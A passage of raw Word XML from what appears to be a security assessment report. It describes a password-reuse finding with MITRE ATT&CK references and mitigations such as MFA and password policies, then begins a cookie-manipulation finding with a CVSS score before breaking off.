                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1110.003: Password Spraying</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="047A6A92">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33A5E21C"/>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B701F1C" w14:textId="665570D5">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2CA6300" w14:textId="33B01612">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Rf6041b2eccac4386">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1036: Account Use Policies</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="054C9A01" w14:textId="709DA277">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R3004c5196c9f4c5f">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1032: Multi-Factor Authentication</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="4D7CB80B" w14:textId="177E66AF">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R875ff380e2314ced">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1027: Password Policies</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="5D641D16">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D56AEB" w14:textId="45CAD37D">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37B43BB" w14:textId="780FECC0">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="4DACB8FD" w14:textId="7178C36F">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293F8316" w:rsidP="0D325B6E" w:rsidRDefault="293F8316" w14:paraId="14BDC9D3" w14:textId="0045879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93F8316" w:rsidP="0D325B6E" w:rsidRDefault="293F8316" w14:paraId="639764C0" w14:textId="5E114753">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="293F831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Multiple accounts on the network were found to be using the same password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="3A80FA4D" w14:textId="631288A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93F8316" w:rsidP="0D325B6E" w:rsidRDefault="293F8316" w14:paraId="603F878D" w14:textId="7CF2B4E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93F8316" w:rsidP="0D325B6E" w:rsidRDefault="293F8316" w14:paraId="6DF11B03" w14:textId="6461541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operational disruptions and data leakage as an attacker that knows the </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credentials for</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a user can gain access </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="30C294D7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to</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other users in the network</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="368EC861">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. This allows the attacker</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F092378">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to impersonate</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them and access resources under their control.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="120B602A" w14:textId="43DEC43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93F8316" w:rsidP="0D325B6E" w:rsidRDefault="293F8316" w14:paraId="18058B94" w14:textId="526EB3E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93F8316" w:rsidP="0D325B6E" w:rsidRDefault="293F8316" w14:paraId="7518C6DF" w14:textId="6F5B3A6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Attempt</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to use the password for </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="16B58FD7">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 X for user Y</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="4C061EA8" w14:textId="4D10761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93F8316" w:rsidP="0D325B6E" w:rsidRDefault="293F8316" w14:paraId="15228CCB" w14:textId="033F675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93F8316" w:rsidP="0D325B6E" w:rsidRDefault="293F8316" w14:paraId="6B757777" w14:textId="3D20063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93F831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D7A967F" w:rsidP="0D325B6E" w:rsidRDefault="4D7A967F" w14:paraId="379902BD" w14:textId="624A0495">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="127"/>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D7A967F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Implement a strong password policy that prohibits reused passwords across multiple accounts or services.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4D7A967F" w:rsidP="0D325B6E" w:rsidRDefault="4D7A967F" w14:paraId="71C01720" w14:textId="01C423BC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="127"/>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D7A967F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Implement multi-factor authentication to prevent access even with reused passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4D7A967F" w:rsidP="0D325B6E" w:rsidRDefault="4D7A967F" w14:paraId="0758A181" w14:textId="3A53A2EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="127"/>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D7A967F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Utilize a password manager to encourage employees to avoid reusing passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4D7A967F" w:rsidP="0D325B6E" w:rsidRDefault="4D7A967F" w14:paraId="631F80C0" w14:textId="6887B1A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="127"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>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4D7A967F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Train all users on the risk of password reuse.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="163D6BA1" w14:textId="5526B53B">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293F8316" w:rsidP="0D325B6E" w:rsidRDefault="293F8316" w14:paraId="38BD12B0" w14:textId="2F23D69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93F8316">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293F8316" w:rsidP="0D325B6E" w:rsidRDefault="293F8316" w14:paraId="45986C70" w14:textId="5E65096C">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34a8dafd93d0446a">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="293F8316">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>DigiCert - Creating Password Policy Best Practices</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="293F8316" w:rsidP="0D325B6E" w:rsidRDefault="293F8316" w14:paraId="5CC2BBF9" w14:textId="793F476D">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2c55689a2d27493f">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="293F8316">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Palo Alto Networks - Multi Factor Authentication</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="0C8A251A" w14:textId="63D2D8DD">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="161AF7BC" w14:textId="68932FB4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos Display" w:hAnsi="Aptos Display" w:eastAsia="Aptos Display" w:cs="Aptos Display"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFC000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="6411DAA9" w14:textId="449A3071">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="3FA0E051" w:rsidP="0D325B6E" w:rsidRDefault="3FA0E051" w14:paraId="79C6A776" w14:textId="57BA8E81">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="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bookmarkStart w:name="_Toc1762375029" w:id="2138230991"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3FA0E051">
        <w:rPr>
          <w:rFonts w:ascii="Aptos Display" w:hAnsi="Aptos Display" w:eastAsia="Aptos Display" w:cs="Aptos Display"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFC000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3FA0E05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Cookie Manipulation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2138230991"/>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2"/>
        <w:gridCol w:w="1582"/>
        <w:gridCol w:w="2490"/>
        <w:gridCol w:w="4350"/>
      </w:tblGrid>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="246BC4A8">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FC1A70" w14:textId="6A49CA65">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2F1BEF" w14:textId="4527DC0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E8F3E6" w14:textId="3C820DCD">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5CE445F">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F7FAE4" w14:textId="6E9162A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1E485AE3" w14:textId="6B510D05">
            <w:pPr>
              <w:spacing w:after="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79D6D1A" w14:textId="6778C29F">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5622B96" w14:textId="273C1C0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18A4A7DD">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>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863FD41" w14:textId="238D41F0">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E12EF02" w14:textId="120341BE">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>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0E40B1F"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4350" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:sz="0"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="07FF3DFA"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="04699D20">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ECCE53" w14:textId="697F9F2A">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F032854" w:rsidP="0D325B6E" w:rsidRDefault="7F032854" w14:paraId="5049EC27" w14:textId="00408D6A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N" r:id="R9a499e4665b54a40">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7F032854">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="7F032854">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="21AE7CD9">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1582"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3C4F62" w14:textId="3654A9E8">
            <w:pPr>
              <w:spacing w:after="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D7A6AE0" w14:textId="27F7E51F">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1F2E621" w:rsidP="0D325B6E" w:rsidRDefault="31F2E621" w14:paraId="573588B4" w14:textId="35D9FCE4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R4d91fdc3bd3b4e07">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="31F2E621">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1606.001: Forge Web Credentials -</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="395951D3">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve"> Web Cookies</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="395951D3">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="06F4F6F7">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1582" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:sz="0"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7D9BFAF5"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1582"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83BC6E" w14:textId="665570D5">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3D5420D" w:rsidP="0D325B6E" w:rsidRDefault="03D5420D" w14:paraId="5A8C7767" w14:textId="064382C9">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97ba383301834f79">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="03D5420D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1041: Encrypt Sensitive Information</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="3567FCE0">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3164"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34ECB0E" w14:textId="45CAD37D">
            <w:pPr>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07886E4" w14:textId="780FECC0">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="39C4CB2C" w14:textId="7178C36F">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3FA0E051" w:rsidP="0D325B6E" w:rsidRDefault="3FA0E051" w14:paraId="15F6AE96" w14:textId="7AD121D1">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D5693CF" w:rsidP="0D325B6E" w:rsidRDefault="4D5693CF" w14:paraId="756FC813" w14:textId="5CD27247">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D5693CF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The web application stores user authorization roles in a client-side cookie and </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="001D370B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
